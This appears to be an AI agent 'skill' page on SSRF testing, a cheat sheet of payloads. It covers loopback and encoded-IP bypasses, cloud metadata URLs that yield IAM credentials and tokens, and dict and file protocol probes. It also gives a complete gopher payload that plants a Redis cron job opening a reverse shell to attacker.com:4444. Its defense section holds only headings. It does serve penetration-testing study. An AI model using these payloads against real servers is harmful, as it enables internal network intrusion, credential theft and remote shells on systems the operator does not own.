SSRF (Server-Side Request Forgery) Testing

Overview

SSRF (Server-Side Request Forgery) is a vulnerability that exploits servers to initiate requests, enabling access to internal network resources, port scanning, or firewall bypassing. This skill provides methods for detecting, exploiting, and defending against SSRF vulnerabilities.

Vulnerability Principle

Applications accept URL parameters and request the specified URL. Attackers can control the target of the request, leading to:

Access to internal network resources
Local file reading
Port scanning
Firewall bypass
Cloud service metadata access

Testing Methods

1. Identify SSRF Input Points

Common Features:

URL Preview/Screenshot
File Upload (Remote URL)
Webhook Callback
API Proxy
Data Import
Image Processing
PDF Generation

2. Basic Detection

Test Local Loopback:

http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]

Test Internal Network IPs:

http://192.168.1.1
http://10.0.0.1
http://172.16.0.1

Test File Protocol:

file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts

3. Bypass Techniques

IP Address Encoding:

127.0.0.1 → 2130706433 (Decimal)
127.0.0.1 → 0x7f000001 (Hexadecimal)
127.0.0.1 → 0177.0.0.1 (Octal)

Domain Resolution Bypass:

127.0.0.1.xip.io
127.0.0.1.nip.io
localtest.me

URL Redirection:

http://attacker.com/redirect → http://127.0.0.1

Protocol Obfuscation:

http://127.0.0.1:80@evil.com
http://evil.com#@127.0.0.1

Exploitation Techniques

Internal Network Detection

Port Scanning:

bash

# Use Burp Intruder
http://127.0.0.1:22
http://127.0.0.1:3306
http://127.0.0.1:6379
http://127.0.0.1:8080
http://127.0.0.1:9200

Service Identification:

Response time differences
Error messages
HTTP status codes
Response content

Cloud Service Metadata

AWS EC2:

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/

Google Cloud:

http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/

Azure:

http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01

Alibaba Cloud:

http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/ram/security-credentials/

Internal Network Application Attacks

Access Admin Backends:

http://127.0.0.1:8080/admin
http://192.168.1.100/phpmyadmin

Unauthorized Redis Access:

http://127.0.0.1:6379
# Then send Redis commands

FastCGI Attack:

http://127.0.0.1:9000
# Execute commands using FastCGI protocol

Advanced Exploitation

Gopher Protocol

Send Arbitrary Protocol Data:

gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aquit%0d%0a

Redis Command Execution:

gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

Dict Protocol

Port Scanning and Information Gathering:

dict://127.0.0.1:6379/info
dict://127.0.0.1:3306/status

File Protocol

Read Local Files:

file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
file:///proc/self/environ

Tool Usage

SSRFmap

bash

# Basic Scan
python3 ssrfmap.py -r request.txt -p url

# Port Scan
python3 ssrfmap.py -r request.txt -p url -m portscan

# Cloud Metadata
python3 ssrfmap.py -r request.txt -p url -m cloud

Gopherus

bash

# Generate Gopher payload
python gopherus.py --exploit redis

Burp Collaborator

Detect Blind SSRF:

http://burpcollaborator.net
# Observe if there are DNS/HTTP requests

Verification and Reporting

Verification Steps

Confirm that the request target can be controlled
Verify access to internal network resources or port scanning
Assess the scope of impact (internal network penetration, data leakage, etc.)
Record complete POC

Reporting Key Points

Vulnerability location and input parameters
Accessible internal network resources or ports
Complete exploitation steps and PoC
Fix recommendations (URL whitelist, disable dangerous protocols, etc.)

Defense Measures

Notes

Only perform tests in authorized environments
Avoid impacting internal network systems
Note the support status of different protocols
Pay attention to request frequency during testing to avoid triggering defenses

ssrf-testing

NPX Install

Tags

SKILL.md Content (Chinese)

SSRF (Server-Side Request Forgery) Testing

Overview

Vulnerability Principle

Testing Methods

1. Identify SSRF Input Points

2. Basic Detection

3. Bypass Techniques

Exploitation Techniques

Internal Network Detection

Cloud Service Metadata

Internal Network Application Attacks

Advanced Exploitation

Gopher Protocol

Dict Protocol

File Protocol

Tool Usage

SSRFmap

Gopherus

Burp Collaborator

Verification and Reporting

Verification Steps

Reporting Key Points

Defense Measures

Recommended Solutions

Notes